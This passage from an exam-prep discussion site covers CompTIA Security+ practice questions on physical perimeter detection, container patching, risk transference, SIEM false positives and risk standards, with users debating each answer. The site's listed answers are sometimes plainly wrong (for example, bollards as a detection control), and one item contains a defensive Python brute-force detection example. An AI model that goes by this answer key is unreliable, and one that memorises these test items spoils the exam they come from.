policies based on location, role, and service level. Domain services, such as Active Directory in the Windows environment, allow administrators to
manage access to resources, including computers, networks, and applications, based on defined policies and rules. They also provide a
centralized system for storing user and group information, making it easier to manage and control access to resources within an organization.

A. Standard naming conventions may help to more easily identify systems, but they do not provide the same level of control over permissions
and policies as domain services.
upvoted 2 times

Mr_BuCk3th34D 1 month, 1 week ago
I think I might change my mind because of the wording on the alternative, here's why:

A directory service is a system that stores, organizes, and manages information about network resources, including devices, users, and
services. It provides a central location where this information can be stored, accessed, and managed in a consistent and organized way.
Directory services can be used to manage permissions and policies based on location, role, and service level by organizing resources into
different groups or categories and assigning permissions or policies to these groups.

A domain service, on the other hand, is a network service that allows a system to join a domain and authenticate with other systems in the
domain. A domain is a logical grouping of network resources that share the same AD database and can be managed as a unit.

So, while directory services and domain services are related, they are not the same thing!

Directory services are used to store and manage information about network resources, while domain services are used to manage access to a
domain and authenticate users and systems within the domain.
upvoted 1 times

bengy78 2 months, 3 weeks ago
Its A, naming standard. Per Comptia Certmaster "The naming strategy should allow administrators to identify the type and function of any
particular resource or location at any point in the CMDB or network directory"
upvoted 1 times

carpathia 2 months, 4 weeks ago
Selected Answer: A
" efficiently identify systems and manage permissions and policies based on location, role, and service level". They purposely missed the "then"
after the Identify Systems.
upvoted 1 times

IYKMba 3 months ago
Domain Services stores centralized directory information and lets users and domains communicate. When a user attempts to connect to a device
or resource on a network, this service provides login authentication, verifying the user's login credentials and access permissions.
Domain services is the correct answer
upvoted 2 times

Jimmycyber123 3 months ago
Selected Answer: A
Anyone picking B should lose their job. That is all. A or leave it blank as you will get the same amount of points.
upvoted 3 times

Renfri 2 months ago
You should lose your job if you think standard naming convention has anything to do with managing permissions and policies.
upvoted 6 times

alwaysrollin247 1 month, 3 weeks ago
You should lose your job if you're not naming your domains using a standard naming convention.
upvoted 2 times

Gary_Phillips_2007 1 month, 3 weeks ago
You should lose your job if you’re not really always rollin. ;)
upvoted 1 times

devampz 4 months ago
Selected Answer: B
Managing permissions is something standard naming conventions do not do. The answer should be B, Domain Services.
upvoted 5 times

_bishalk__ 4 months, 1 week ago
Key point here: "identify systems and manage permissions". A standard naming convention will help with identifying, but the question also says manage permissions, so the correct answer is Domain Services.
upvoted 5 times

devampz 4 months ago
same idea
upvoted 1 times

Gravoc 4 months, 3 weeks ago
Naming conventions. The keyword in this question is identify. Per the official CompTIA Sec+ study guide: "Hardening endpoints involves knowing
which systems you're managing and ensuring that the systems on your network are the systems that you expect. Standards can help with that.
The Security+ exam calls out standard naming conventions as one option. They can help you identify systems based on purpose, location, or
other elements included in the naming convention. They make scripting and management easier because you can filter, sort, and take other
actions more easily using a standard naming convention".
upvoted 2 times
Question #31 Topic 1

Which of the following would detect intrusions at the perimeter of an airport?

A. Signage

B. Fencing

C. Motion sensors

D. Lighting

E. Bollards

Correct Answer: E

Community vote distribution: C (96%) 2%

ender1701 Highly Voted 5 months ago
Selected Answer: C
Seriously, how does Bollards get identified as the correct answer on this site? It doesn't detect, it deters. It's a post.
upvoted 22 times

Sklark 3 months, 2 weeks ago
Hahaha your response is priceless! "Oh no! We must be very stealthy. We wouldn't want the bollards to see us!!"
upvoted 6 times

4342421222 4 months ago
Right, but the first rule of security is physical. That's why it's correct. You would detect a vehicle driving up to a bollard. Motion sensors are similar to IDSs. Important, but physical is the more important part of the question.
upvoted 1 times

Nokia6681 4 months ago
Bollards are preventive, and motion sensors are detective. The question says "detect".
upvoted 5 times

creativenickname 4 months ago
But the question is "Which of the following would detect intrusions at the perimeter of an airport?". It's asking what object would detect.
Bollards can't detect anything, they're a cement or metal rod in the ground.
upvoted 3 times

m33lz Highly Voted 1 month, 3 weeks ago
Who reviews these questions and answers? Bollards, seriously. It's difficult to study when 60% of the answers are wrong.
upvoted 6 times

DALLASCOWBOYS Most Recent 6 days, 11 hours ago
C. Motion sensors are devices that sense movement or sound in a specific area.
upvoted 1 times

JustIyke 3 weeks, 2 days ago
Motion sensor is definitely the correct answer. Lighting comes close but the keyword here is "detect" and that eliminates all the other options.
upvoted 1 times

CL_QRT 3 weeks, 4 days ago
I'll go with C.
upvoted 1 times

lferolm 1 month ago
Selected Answer: D
From Comptia book:

...
Protective lighting improves visibility for checking badges and people at entrances, inspecting vehicles, and detecting intruders both outside and
inside buildings and grounds.
...
upvoted 1 times

KingDrew 3 weeks, 3 days ago
Yes but the lights don't detect anything, they deter criminals. On the other hand motion sensors activate when someone comes within their
vicinity, making them "detect" the threat.
upvoted 1 times

Besmira 2 months ago
A perimeter intrusion detection system (PIDS) is a device or sensor that detects the presence of an intruder attempting to breach the physical
perimeter of a property, building, or other secured area.
So the best answer is C
upvoted 1 times

Nirmalabhi 2 months, 1 week ago
Selected Answer: C
The correct answer according to me is C.Motion sensors. The key word in the question is "detect". something that will alert that there is an
intrusion.
Bollards can act as physical barrier but it cannot detect if some intruder crossed it or even fencing can be tripped but how will it detect if
someone jumped a fence or not? Signage can only act as deterrent.
upvoted 1 times

rodwave 2 months, 3 weeks ago
The answer is fencing. For this specific scenario, we're looking to detect intrusions on a perimeter and there is a type of intrusion detection
system used on fences that can be used to monitor the perimeter of a property called PIDS. A Perimeter Intrusion Detection System (PIDS) are
fence-mounted sensors that monitor and detects any intruder attempting to breach the physical perimeter by sensing when someone attempts to
either climb or cut the fence.

Yes, motion sensors can detect any movement, but this can easily lead to false alarms as they aren't the best for detecting types of movement. For example, a motion detector that detects an employee authorized to access a restricted area. Just because it detected motion doesn't necessarily mean they're intruders. PIDS will only generate an alarm when someone is attempting to climb/cut a fence, as that type of action would very likely be an intrusion attempt.
upvoted 2 times

Orean 3 months ago
Selected Answer: B
One of the rare times I confidently disagree with the vast majority of votes.

"Fibre optic cable is designed to detect and pinpoint the location of intrusion anywhere on the airport perimeter fence, providing real-time
reporting of intrusion"

Operative word is PERIMETER, where there's fencing. Yes, fencing sounds like a simple preventive measure, but it's often also a detective one
for airports which have fiber-optic IDSs.
upvoted 1 times

[Removed] 2 months, 3 weeks ago
Actually the operative word is "detect."
upvoted 1 times

ipin 4 months ago
maybe when a truck hit the bollards......
upvoted 4 times

emtpyspoon885 4 months, 1 week ago
Selected Answer: C
Not sure how bollards would detect.
upvoted 1 times

jaredsmith677 4 months, 1 week ago
Bollards are usually steel stanchions filled with concrete. I don't know what the detection capabilities of that would be, but what does CompTIA score for this question?
upvoted 1 times

Wutan 4 months, 2 weeks ago
Selected Answer: C
Motion sensors of course.
upvoted 1 times

Wazza1878 4 months, 2 weeks ago
Motion sensors
upvoted 1 times

Gravoc 4 months, 3 weeks ago
This question is a great example of not trusting the official answer. Bollards? LMAO. Still don't trust the discussion answers, as I've disagreed
with a few general consensuses after doing deep dives into the topic.

Bollards - Physical barrier
Signage - Can be a deterrent depending on the context of the sign message, such as "RESTRICTED AREA".
Lighting - A deterrent in security settings.
Motion sensors - A detection method, in which an alarm or alert is triggered the moment it detects motion.
upvoted 2 times

Phresh90 4 months, 2 weeks ago
Right! I agree. I was just telling myself that. How does a bollard detect? Like really...
upvoted 1 times

RonWonkers 4 months, 3 weeks ago
Selected Answer: C
lmao how is it a bollard bruh
upvoted 2 times
Question #32 Topic 1

A security analyst is concerned about critical vulnerabilities that have been detected on some applications running inside containers. Which of the following is the BEST remediation strategy?

A. Update the base container image and redeploy the environment.

B. Include the containers in the regular patching schedule for servers.

C. Patch each running container individually and test the application.

D. Update the host in which the containers are running.

Correct Answer: B

Community vote distribution: A (64%) C (18%) Other

Gravoc Highly Voted 4 months, 3 weeks ago
A is incorrect. The answer is D. Really shows that the voters don't know much about containers here. A container is merely a text file that allocates resources and libraries to a virtual environment, which in turn allows an application to function in an isolated environment. That's it.

The containers share the same Kernel as the base host system. Only the system Kernel and a text file of allocated resources and libraries stands
between a critical vulnerability, and gaining access to the standard host computing environment. Swiss Cheese model and Defense-in-Depth
applies here. Since there's no update to be applied to the container, and the base host & containers all are reliant on the same Kernel. Keeping
the host system up to date with all security patches and firmware patches is the best way to prevent a critical vulnerability from breaking out of a
container.

Look up the container hierarchy, "dirty-pipe-exploit', and Docker software.

Hardware > OS > Virtual Machine > Docker > Container

Updating the host machine is absolutely the answer.
upvoted 21 times

_bishalk__ 4 months, 1 week ago
The only thing a container shares with the host machine is the kernel, so if we patch and upgrade the kernel version it doesn't necessarily eliminate the vulnerabilities associated with other packages in the repos of that container, so the best way to patch a container must be followed, and that is only possible when someone updates the base container image and redeploys it. So the correct answer is A here.
upvoted 4 times

VendorPTS 4 months ago
Agreed. It's a bit of a tricky one because Gravoc isn't wrong that the host OS and kernel vulnerabilities there are important, but the
question says the analyst is concerned about "critical vulnerabilities that have been detected on some applications running *INSIDE*
containers." As you mentioned, aspects of the vulnerability may be limited to what is running in the container.

Read the section "Containers let you patch continuously, automatically" in the article below

https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-how-containers-enable-passive-patching-
and-a-better-model-for-supply-chain-security
upvoted 8 times

kennyleung0514 3 months, 2 weeks ago
agreed. As containers should be short-life, or be more accurate, it should not have any modifications once deployed. If there's any
update on the containers, it would be faster to deploy it with updated base image
upvoted 5 times

Bob455 4 months, 2 weeks ago
THANK YOU SOMEONE
upvoted 2 times

rodwave Highly Voted 2 months, 3 weeks ago
Selected Answer: A
Answer: Update the base container image and redeploy the environment (A)

In the scenario, the vulnerabilities found were critical meaning that patches would need to be applied immediately.

The options to patch the containers (B &C) could work, however, patching would likely take months, seeing how this vulnerability is critical,
neither would address the concern's urgency.

The option to update the host (D) also could work, however, the scenario specified that the vulnerabilities have been detected only on some
applications and not on the host itself. While a container runs on a host machine, it does not mean they share the same vulnerabilities. So
updating the host would likely not patch the vulnerabilities that were found in the containers.

Out of the given options, the option to update on the base container image would 1.) addresses where the vulnerabilities were found and what
needs to be updated and 2.) addresses the urgency to patch the critical vulnerability.
upvoted 9 times

ronniehaang Most Recent 4 days, 22 hours ago
Selected Answer: A
A. Update the base container Image and redeploy the environment.

The best remediation strategy for addressing vulnerabilities in containers is to update the base container image and redeploy the environment.
This will ensure that all containers created from that image will be free from the critical vulnerabilities. Updating each running container
individually and testing the application can be time-consuming and error-prone. Updating the host in which the containers are running may not
address the vulnerabilities in the individual containers. Including the containers in the regular patching schedule for servers may not provide a
quick enough response time to address critical vulnerabilities.
upvoted 1 times

DALLASCOWBOYS 6 days, 10 hours ago
This is a bad question. D is the best answer. Container security is the implementation of security measures at the container host, as well as within the container itself; however, adding security products into a container can be challenging to impossible.
upvoted 1 times

TheDarkSide2405 2 weeks, 4 days ago
The best remediation strategy in this case would be option A, "Update the base container image and redeploy the environment."

The reasoning behind this answer is that updating the base container image guarantees that the latest security updates and vulnerability fixes are included. This ensures that all containers based on that image also benefit from the updates. In addition, redeploying the environment also provides the opportunity to verify that the application keeps working correctly after the update.
upvoted 1 times

rumblerally 3 weeks, 2 days ago
A. Update the base container image and redeploy the environment.
This is the best option because updating the base container image will ensure that any critical vulnerabilities that were present in the previous
version of the image will be fixed in the updated version. Redeploying the environment with the updated image will ensure that all of the running
containers are using the updated, secure image. Additionally, since updating the base image and redeploying the environment would impact all
the running containers, it would prevent from missing any of them

B. Including the containers in the regular patching schedule for servers is another good practice to keep them updated but it would not address
the current vulnerabilities

C. Patching each running container individually could be very time-consuming and prone to errors.

D. Updating the host in which the containers are running should be part of a regular maintenance schedule and it is not directly addressing the
vulnerabilities in the containers.
upvoted 2 times

Abdul2107 4 weeks, 1 day ago
Selected Answer: A
The answer is B according to this Google Article:
https://cloud.google.com/blog/products/containers-kubernetes/exploring-container-security-how-containers-enable-passive-patching-and-a-
better-model-for-supply-chain-security
upvoted 1 times

hieptran 1 month ago
Selected Answer: C
C is the correct answer.
Since A - does not include the testing phase -> it's not the best answer.
Also, only some containers are vulnerable. Not all of them need to be re-image (form up update) then redeploy. This would take much longer time
to rebuild and redeploy everything and could impair the Availability (CIA) of the applications.
upvoted 2 times

krayxay 1 month, 2 weeks ago
Selected Answer: C
Googled the question and two other sites say C?
upvoted 2 times

jansoid 2 months, 4 weeks ago
Selected Answer: C
Considering not all containers are affected.
upvoted 2 times

babyzilla 3 months ago
Selected Answer: A
The reason I chose A over B, is because B would likely take too long to address a critical vulnerability. The scheduled patch could be weekly or
monthly.
upvoted 1 times

Gr3gg3 3 months ago
Selected Answer: A
Containers are immutable objects, so software updates take the form of replacing the previous version with an updated one
upvoted 1 times

be9z 3 months, 2 weeks ago
The answer is C. First you need to understand that securing container images is number one way of implementing container security best
practices.

You also need to know that container images are used to create containers. And that applications are included in container images.

In the question, SOME applications in containerS have vulnerabilities. This implies that not all the containers are vulnerable. To carefully ensure
security, try patching each container and testing them for remediation purpose.
upvoted 3 times

  Knowledge33 3 months, 2 weeks ago


Selected Answer: C
The response is C. The vulnerability is on some apps on certain containers. We don't need to update the host (D is false) because if the issue is
related to the app, it will not solve the issue.
upvoted 2 times

  DandyAndy 4 months, 1 week ago


Selected Answer: D
D You have to update the base machine
upvoted 2 times

  Strykar 4 months, 1 week ago


Selected Answer: D
I agree with Gravoc.
upvoted 1 times

  Halaa 4 months, 2 weeks ago


Selected Answer: A
Update the base container image, as the vulnerability is inside the containers themselves.
upvoted 2 times


Question #33 Topic 1

An organization has decided to purchase an insurance policy because a risk assessment determined that the cost to remediate the risk is greater
than the five-year cost of the insurance policy. The organization is enabling risk:

A. avoidance.

B. acceptance.

C. mitigation.

D. transference.

Correct Answer: D

Community vote distribution


D (100%)

  [Removed] Highly Voted  5 months, 1 week ago


Selected Answer: D
D. transference.
upvoted 10 times

  varun0 Highly Voted  5 months ago


Transference as the financial loss if the risk materializes is transferred to the insurance company
upvoted 7 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


D. Any time insurance is used, you are transferring the risk to the insurance company
upvoted 2 times

  rodwave 2 months, 3 weeks ago


Selected Answer: D
Answer: Risk Transference

Risk Transference is transferring risk to a third party such as a vendor. In cyber security, that can be through utilizing cyber-risk insurance. Cyber
insurance generally covers a business' liability for a data breach involving sensitive customer information, such as account numbers, credit card
numbers, health records etc.

==============================================
Other Choices:

Risk Avoidance - Strategy that eliminates risk by avoiding activities that would expose themselves to the risk.

Risk Mitigation - the practice of reducing the impact of risks through preventative and reactive planning

Risk Acceptance - When a business or individual accepts the potential loss from a risk. Generally occurs when the business or individual feels
that the risk does not warrant the countermeasures.
upvoted 3 times

  Gr3gg3 3 months ago


Selected Answer: D
D. Transferring the risk to a Third Party
upvoted 1 times

  Jossie_C 3 months ago


You're transferring the risk to the insurer. D. TRANSFERENCE.
upvoted 1 times

  banditring 4 months ago


whenever I see insurance I always go with transference
upvoted 2 times


Question #34 Topic 1

A security analyst receives an alert from the company's SIEM that anomalous activity is coming from a local source IP address of 192.168.34.26.
The Chief Information Security Officer asks the analyst to block the originating source. Several days later, another employee opens an internal ticket stating
that vulnerability scans are no longer being performed properly. The IP address the employee provides is 192.168.34.26. Which of the following
describes this type of alert?

A. True negative

B. True positive

C. False positive

D. False negative

Correct Answer: A

Community vote distribution


C (83%) B (17%)

  redsidemanc2 Highly Voted  4 months, 4 weeks ago


Selected Answer: C
True Positive: A legitimate attack which triggers to produce an alarm. You have a brute force alert, and it triggers. You investigate the alert and
find out that somebody was indeed trying to break into one of your systems via brute force methods.

False Positive: An event signalling to produce an alarm when no attack has taken place. You investigate another of these brute force alerts and
find out that it was just some user who mistyped their password a bunch of times, not a real attack.

False Negative: When no alarm is raised when an attack has taken place. Someone was trying to break into your system, but they did so below
the threshold of your brute force attack logic. For example, you set your rule to look for ten failed login in a minute, and the attacker did only 9.
The attack occurred, but your control was unable to detect it.

True Negative: An event when no attack has taken place and no detection is made. No attack occurred, and your rule didn't fire.
upvoted 12 times

  redsidemanc2 4 months, 4 weeks ago


Alarms triggered and the CISO blocked the scanner IP. Later the scanner is not working because the CISO blocked the scanner.
upvoted 1 times
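The four outcomes described above are easiest to see when a real detection rule is run over data whose ground truth is known. The following is an added example (not code from the thread or from ExamTopics): a brute-force rule with the same "ten failed logins in a minute" shape is run over constructed log lines, the flagged sources are scored against the known truth, and the scanner IP from the question is then allowlisted to show how a known-benign source is kept from producing the false positive most of the thread reads the scenario as. All log lines, IPs, usernames and the threshold are constructed for illustration.

```python
"""Brute-force login rule run over constructed auth log lines, then scored
against known ground truth as true/false positives and negatives.

Added example, not code from the ExamTopics thread. The log lines,
IP addresses, usernames and the 10-failures-in-60-seconds threshold are all
constructed for illustration.
"""
from collections import defaultdict


def _failures(ip, user, start, count, step=5):
    """Build `count` FAIL lines from one source, `step` seconds apart."""
    return [f"{start + i * step} FAIL {ip} {user}" for i in range(count)]


# Constructed log: "<epoch seconds> <result> <source ip> <user>", one event per line.
LOG_LINES = "\n".join(
    _failures("10.0.0.7", "alice", 1000, 10) + ["1055 SUCCESS 10.0.0.7 alice"]
    + _failures("10.0.0.9", "admin", 2000, 9)
    + _failures("10.0.0.11", "root", 3000, 12)
    + ["4000 FAIL 10.0.0.5 bob", "4030 SUCCESS 10.0.0.5 bob"]
    + _failures("192.168.34.26", "svc-scan", 5000, 15)
)

# What actually happened (known here only because the data is constructed).
GROUND_TRUTH = {
    "10.0.0.7": False,        # alice mistyping her password ten times
    "10.0.0.9": True,         # attacker deliberately staying under the threshold
    "10.0.0.11": True,        # noisy attacker
    "10.0.0.5": False,        # ordinary user, one typo
    "192.168.34.26": False,   # authenticated vulnerability scanner probing service accounts
}

SCANNER_ALLOWLIST = frozenset({"192.168.34.26"})


def parse_log(text):
    """Parse the constructed format into (timestamp, result, ip, user) tuples."""
    events = []
    for line in text.strip().splitlines():
        ts, result, ip, user = line.split()
        events.append((int(ts), result, ip, user))
    return events


def brute_force_alerts(events, threshold=10, window=60, allowlist=frozenset()):
    """Flag every source IP with at least `threshold` FAIL events inside any
    `window`-second span. Sources on `allowlist` are never flagged."""
    fails = defaultdict(list)
    for ts, result, ip, _user in events:
        if result == "FAIL":
            fails[ip].append(ts)
    flagged = set()
    for ip, stamps in fails.items():
        if ip in allowlist:
            continue
        stamps.sort()
        start = 0
        for end in range(len(stamps)):          # sliding window over sorted timestamps
            while stamps[end] - stamps[start] > window:
                start += 1
            if end - start + 1 >= threshold:
                flagged.add(ip)
                break
    return flagged


def score(flagged, ground_truth):
    """Bucket every known source into TP / FP / FN / TN."""
    out = {"true_positive": [], "false_positive": [],
           "false_negative": [], "true_negative": []}
    for ip, malicious in ground_truth.items():
        alerted = ip in flagged
        if alerted and malicious:
            out["true_positive"].append(ip)
        elif alerted:
            out["false_positive"].append(ip)
        elif malicious:
            out["false_negative"].append(ip)
        else:
            out["true_negative"].append(ip)
    return {k: sorted(v) for k, v in out.items()}


def run(allowlist=frozenset()):
    """Run the rule over the constructed log and return the scored outcome."""
    flagged = brute_force_alerts(parse_log(LOG_LINES), allowlist=allowlist)
    return score(flagged, GROUND_TRUTH)


if __name__ == "__main__":
    print("no allowlist:   ", run())
    print("scanner allowed:", run(SCANNER_ALLOWLIST))
```

Without the allowlist the rule produces one true positive (10.0.0.11), two false positives (alice and the scanner), one false negative (the attacker who stopped at nine attempts) and one true negative. Adding the scanner to the allowlist removes its false positive without touching the other outcomes; lowering the threshold would catch the nine-attempt attacker but would also turn more ordinary typists into false positives, which is the tuning trade-off the thread's definitions describe.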

  ronniehaang Most Recent  4 days, 22 hours ago


Selected Answer: C
C. False positive. A false positive is a security alert that is generated when there is no actual threat or security violation, but the security system
identifies it as such. In this scenario, the IP address 192.168.34.26 was blocked based on a security alert from the SIEM, but it turns out that the
IP address was associated with a legitimate source (vulnerability scans). This results in the false positive, where the security system is blocking a
legitimate activity.
upvoted 1 times

  DALLASCOWBOYS 6 days, 10 hours ago


B. This situation is a true positive, as the most recent ticket indicated that the vulnerability scan was no longer working properly, thus the
malicious activity was properly detected, indicating a malicious (anomaly) was detected properly.
upvoted 1 times

  sanlibo 2 weeks, 2 days ago


Selected Answer: C
False Positive = False alert
upvoted 1 times

  asum 3 weeks, 1 day ago


Selected Answer: B
True Positive: A legitimate attack which triggers to produce an alarm. You investigate the alert and find out that somebody was indeed trying to
break into one of your systems via brute force methods. <<Anomaly activity is from an IP address.>>
upvoted 2 times

  KingDrew 3 weeks, 3 days ago


Selected Answer: C
Activity was from employee, not threat, and no attack was performed. Answer is C
upvoted 1 times

  amuk21 4 months, 2 weeks ago



SIEM alert was triggered with no potential malicious activity. Second part of the question mentions that SEVERAL days later a ticket was out in
for an issue with vulnerability scanning which becomes irrelevant due to time lag between the alert and issue reported. This is certainly a false
positive.
upvoted 3 times

  yorkwu 5 months ago


Selected Answer: C
Agree with C here
upvoted 2 times

  Joe1984 5 months ago


Selected Answer: C
false positive
upvoted 1 times

  varun0 5 months ago


I'm confused about this one. The vulnerability scan is not being performed because that IP is blocked right.
upvoted 2 times

  varun0 5 months ago


CISO thought the alert could be real and went as far as to block it, which makes me think that the alert is true positive.
upvoted 4 times

  Wiggie 5 months ago


Selected Answer: B
The answer is B
upvoted 3 times

  CurlyD 5 months ago


Selected Answer: C
Looks like False Positive.
upvoted 3 times

  pendekarsuling 5 months, 1 week ago


True negative: no rule matched and attack present.
In this case the SIEM gives an alert, so the answer is B, true positive.
upvoted 3 times

  stoneface 5 months, 1 week ago


Selected Answer: C
A false positive is something that is identified by a scanner or other assessment tool as being a vulnerability, when in fact it is not. For example,
assume that a vulnerability scan identifies an open port on the firewall. Because a certain brand of malware has been known to use this port, the
tool labels this as a security risk, and recommends that you close the port. However, the port is not open on your system. Researching the issue
costs time and effort, and if excessive false positives are thrown by a vulnerability scan, it is easy to disregard the scans entirely, which could
lead to larger problems.
upvoted 4 times


Question #35 Topic 1

A security analyst wants to reference a standard to develop a risk management program. Which of the following is the BEST source for the analyst
to use?

A. SSAE SOC 2

B. ISO 31000

C. NIST CSF

D. GDPR

Correct Answer: C

Community vote distribution


B (89%) 11%

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: B
ISO 31000 The ISO 31000 Risk Management framework is an international standard that provides businesses with guidelines and principles for
risk management from the International Organization for Standardization. Regulatory compliance initiatives are usually specific to a particular
country and applicable to certain sized businesses or businesses in specific industries. However, ISO 31000 is designed to be used in
organizations of any size. Its concepts work equally well in the public and the private sector, in large or small businesses and nonprofit
organizations.
upvoted 22 times

  carpathia Highly Voted  2 months, 4 weeks ago


Depends how you define Security Analyst: if it's cyber then it's NIST CSF, if he/she deals with general risk (not only cyber) then it's the ISO 31000.
God help us with CompTIA style questions...
upvoted 6 times

  carpathia 2 months, 4 weeks ago


Coming back to my post, they mention "standard". I don't think NIST CSF is a standard per se, just recommendations. ISO is definitely a
standard.
upvoted 1 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


B. ISO 31000 is a family of standards and guidelines for implementing a risk management-based security policy.
upvoted 1 times

  [Removed] 1 month, 2 weeks ago


Selected Answer: C
Despite the complexity of implementing the NIST CSF, its ability to unify cybersecurity efforts and bridge the gap between technical and business
leaders makes it the gold standard for developing a risk management plan. Going with C…
upvoted 2 times

  jhfdkjshfkjdsho 1 month, 3 weeks ago


Selected Answer: C
NIST CSF: "The Framework Core consists of
five concurrent and continuous Functions—Identify, Protect, Detect, Respond, Recover.
When considered together, these Functions provide a high-level, strategic view of the
lifecycle of an organization's management of cybersecurity risk."
upvoted 2 times

  sauna28 1 month, 3 weeks ago


Selected Answer: B
Risk Management Framework definitely ISO31000
upvoted 1 times

  fzorsqqmdmsvfqvqdv 1 month, 4 weeks ago


Selected Answer: B
It's ISO.
The key is "standard"
CSF is a framework.
upvoted 1 times

  Jimmycyber123 3 months ago


Selected Answer: B
If in doubt use google, but in this case iso 31000 or b is the answer
upvoted 2 times
  darkgypsy 3 months ago
by CompTIA Guide ..." Most companies will institute enterprise risk management (ERM) policies and procedures, based on frameworks such as
NIST's Risk Management Framework (RMF) or ISO 31K. ..so the B
These legislative and framework compliance requirements are often formalized as a Risk and Control Self-Assessment (RCSA).
upvoted 1 times

  Fitzd 4 months, 3 weeks ago


NIST is considered best for organizations that are in the early stages of developing a risk management plan. ISO 27001, comparatively, is better
for operationally mature organizations.
upvoted 2 times

  Fitzd 4 months, 3 weeks ago


Which of the following is the BEST source for the analyst to use?
upvoted 1 times

  carpathia 4 months, 3 weeks ago


Selected Answer: B
ISO 31000 addresses all forms of risk and management, not just cybersecurity risks. Exactly what the question asks. The question doesn't
mention cyber security in particular.
upvoted 2 times

  NICKJONRIPPER 2 months, 2 weeks ago


A security analyst wants to...
upvoted 1 times

  Halaa 4 months, 4 weeks ago


Selected Answer: B
ISO 31000 Risk management
upvoted 2 times

  varun0 5 months ago


Selected Answer: B
B ISO 31000
upvoted 3 times


Question #36 Topic 1

The Chief Information Security Officer (CISO) requested a report on potential areas of improvement following a security incident. Which of the
following incident response processes is the CISO requesting?

A. Lessons learned

B. Preparation

C. Detection

D. Containment

E. Root cause analysis

Correct Answer: A

Community vote distribution


A (100%)

  rodwave Highly Voted  2 months, 3 weeks ago


Selected Answer: A
Answer: Lessons learned

Lessons learned is the final step in the incident response where the organization reviews their incident response and prepare for a future attack.
This is where you understand how/why an incident occurred, identify any weaknesses in your organization's practices, any positive elements or
practices that went well, and things that could be done to prepare for a future incident.
=========================
Incident Response - A set of instructions or procedures an IT staff follows to detect, respond to, and recover from a security incident.

Phases in the Incident Response Plan


1. Preparation: The organization plans out how they will respond to attack, this can involve:
2. Identification: Detecting and determining whether an incident has occurred.
3. Containment: Once a threat has been identified, the organization must limit or prevent any further damage.
4. Eradication: The removal of the threat
5. Recovery: Restoring systems affected by the incident
6. Lessons Learned: Where the organization reviews their incident response and prepare for a future attack
upvoted 7 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


A. Lessons Learned. Evaluates the response plan and procedures and improve them as necessary
upvoted 1 times

  mlonz 2 weeks, 5 days ago


something straightforward
upvoted 1 times

  Korokokokokoko 2 months, 2 weeks ago


Selected Answer: A
This is the correct answer
upvoted 1 times

  comeragh 5 months ago


Selected Answer: A
A - Lessons Learned agree with
upvoted 3 times

  varun0 5 months ago


Selected Answer: A
Lessons learned is a process in incident response to learn from the incident and improve.
upvoted 3 times

  stoneface 5 months, 1 week ago


Selected Answer: A
What are lessons learned ? The Project Management Institute (PMI) defined as “the learning gained from the process of performing the project”.
In the context of security incidents, they usually take place after a security incident has occurred and has been mitigated.

upvoted 4 times


Question #37 Topic 1

A company is providing security awareness training regarding the importance of not forwarding social media messages from unverified sources.
Which of the following risks would this training help to prevent?

A. Hoaxes

B. SPIMs

C. Identity fraud

D. Credential harvesting

Correct Answer: A

Community vote distribution


A (83%) Other

  babyzilla Highly Voted  3 months ago


I read the comments below. Many of you are associating social media messages with fake news which is leading you to the answer: Hoax.
However, social media messages are usually just that, messages. Think of a DM via Instagram. That is a direct message through a social media
application. Most social media platforms have IM features. I think there is a false notion of fake news with this question. For this reason, I believe it is
SPIM.
upvoted 9 times

  Joe1984 Highly Voted  5 months ago


Selected Answer: A
Hoaxes
upvoted 8 times

  DALLASCOWBOYS Most Recent  6 days, 10 hours ago


A. Hoax. Is designed to convince targets to perform an action that would reduce or harm their IT security. often encourages victims to spread the
word. Since they are concerned with forwarding unverified sources, suggests it is a hoax they are concerned with.
upvoted 1 times

  shi_ 1 week ago


Selected Answer: B
This question really has vague answer options.... I was contemplating between hoaxes and SPIM; however, IMO in terms of loss, hoaxes don't
cost much for a company (for example, resulting in a sense of urgency to forward threatening/frightening messages that affect the company), however
SPIM can be quite fatal for a company (for example, clicking a link resulting in malware/spyware)
upvoted 1 times

  JustIyke 3 weeks, 2 days ago


Context is important in this question. Per COMPTIA definitions, the answer is SPIM because the message comes from Social Media. Hoax or any
other option will be correct in conventional terms, but for the purpose of this test I am 100% sure the answer is SPIM
upvoted 3 times

  blacktaliban 3 months ago


Selected Answer: A
Sharing unverifiable information on social media might as well say its fake news
upvoted 1 times

  BigLao 3 months, 1 week ago


I would go with spim.
The question talks about social media and when you look at the definition of spim it ties with it perfectly.
upvoted 3 times

  Jossie_C 3 months ago


This is incorrect. Spam is Spam over instant messaging. Social media is not necessarily instant messaging
upvoted 1 times

  rindrasakti 3 months, 3 weeks ago


Selected Answer: A
Of course the answer is A, Hoaxes
upvoted 1 times

  Iamboolean 4 months, 3 weeks ago


Selected Answer: A
Answer A = Hoaxes = Fake News.
upvoted 1 times

  Wiggie 5 months ago


Selected Answer: A
Answer is A
upvoted 2 times

  comeragh 5 months ago


Selected Answer: C
I agree with C being the best choice answer here
upvoted 1 times

  varun0 5 months ago


Selected Answer: A
Hoaxes are fake news; the company is asking employees not to share messages which are not from a reputed source or a trustworthy news
organization, for example, not your mom's Facebook group about anti-vax.
upvoted 2 times

  stoneface 5 months ago


Selected Answer: C
I think the best answer to this is Identity fraud.

SPIM is spam over instant messaging.


Hoaxes are another common social engineering technique, often combined with phishing attacks. An email alert or web pop-up will claim to have
identified some sort of security problem, such as virus infection, and offer a tool to fix the problem.

Credential harvesting -- not applicable


upvoted 1 times

  varun0 5 months ago


How would you gain someone's documents from social media which will then be used to impersonate that person? Its not like people post
their social security number on Facebook.

Hoaxes = fake news.


upvoted 9 times

  stoneface 5 months ago


I stand corrected, A is correct -> Professor Messer video explaining hoaxes https://www.youtube.com/watch?v=9fXbXQ-pnsY
upvoted 11 times


Question #38 Topic 1

A security analyst is receiving numerous alerts reporting that the response time of an internet-facing application has been degraded. However, the
internal network performance was not degraded. Which of the following MOST likely explains this behavior?

A. DNS poisoning

B. MAC flooding

C. DDoS attack

D. ARP poisoning

Correct Answer: C

Community vote distribution


C (100%)

  stoneface Highly Voted  5 months, 1 week ago


Selected Answer: C
Most denial of service (DoS) attacks against websites and gateways are distributed DoS (DDoS). This means that the attack is launched from
multiple hosts simultaneously. Typically, a threat actor will compromise machines to use as handlers in a command and control network. The
